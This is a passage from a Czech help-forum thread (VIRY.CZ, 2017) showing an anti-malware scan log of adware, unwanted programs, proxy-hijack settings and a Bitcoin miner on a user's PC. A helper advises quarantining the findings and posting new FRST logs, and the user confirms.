Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.083, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.084, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.085, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.086, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.087, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.088, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.089, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.090, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.091, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.092, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.093, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.094, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.095, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.096, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.097, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.098, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.099, Žádná uživatelská akce, [84], [374779],1.0.1530
PUP.Optional.PCSpeedUp, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\PCSUUCDRV, Žádná uživatelská akce, [8458], [241622],1.0.1530
PUP.Optional.UCBrowser, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ucdrv, Žádná uživatelská akce, [10556], [380111],1.0.1530

Hodnota v registru: 7
PUP.Optional.ProxyHijacker.BCM, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Žádná uživatelská akce, [4533], [-1],0.0.0
PUP.Optional.ProxyHijacker.BCM, HKU\S-1-5-21-732140370-2414468103-320680840-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Žádná uživatelská akce, [4533], [-1],0.0.0
PUP.Optional.ProxyHijacker.BCM, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Žádná uživatelská akce, [4533], [-1],0.0.0
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{52F7BE5C-2C3B-4C7B-A96D-F19B9EC1992D}|CONTACT, Žádná uživatelská akce, [697], [333851],1.0.1530
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{52F7BE5C-2C3B-4C7B-A96D-F19B9EC1992D}|URLINFOABOUT, Žádná uživatelská akce, [697], [335317],1.0.1530
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{F0847AE0-465A-4D7B-A555-AABB43B550F0}|CONTACT, Žádná uživatelská akce, [697], [333851],1.0.1530
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{F0847AE0-465A-4D7B-A555-AABB43B550F0}|URLINFOABOUT, Žádná uživatelská akce, [697], [321304],1.0.1530

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)

Soubor: 5
PUP.Optional.OpenCandy, C:\ADWCLEANER\QUARANTINE\FILES\VPOVIKNVVMBZVMDSHCFCCLBWORHSSPMH\F0DBA638A0934A34A07E67185E97F9E3\DU.EXE, Žádná uživatelská akce, [648], [67454],1.0.1530
PUP.Optional.OnlineIO, C:\FRST\QUARANTINE\C\PROGRAM FILES (X86)\MICROLEAVES\ONLINE.IO APPLICATION\ONLINE APPLICATION UPDATER.EXE, Žádná uživatelská akce, [697], [360154],1.0.1530
PUP.Optional.OnlineIO, C:\FRST\QUARANTINE\C\PROGRAM FILES (X86)\MICROLEAVES\TRAFFIC EXCHANGE\TRAFFIC EXCHANGE UPDATER.EXE, Žádná uživatelská akce, [697], [360154],1.0.1530
RiskWare.BitCoinMiner, C:\USERS\PUBLIC\WINDOWS\MINERD.EXE, Žádná uživatelská akce, [148], [75880],1.0.1530
PUP.Optional.ProxyHijacker.BCM, C:\USERS\PUBLIC\WINDOWS\MINING_PROXY.EXE, Žádná uživatelská akce, [4533], [12164],1.0.1530

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)

(end)

#14 Příspěvek od **altrok** » 18 bře 2017 15:27

Vsechny nalezy smazte/presunte do karanteny. Pak dejte nove logy FRST.txt a Addition.txt (bez pouziti FRSTLauncheru).

jarmyl · #15 Příspěvek od **jarmyl** » 21 bře 2017 05:11

nalezené dáno do karantény, logy v příloze.

VIRY.CZ

qtipr.com

qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com

Re: qtipr.com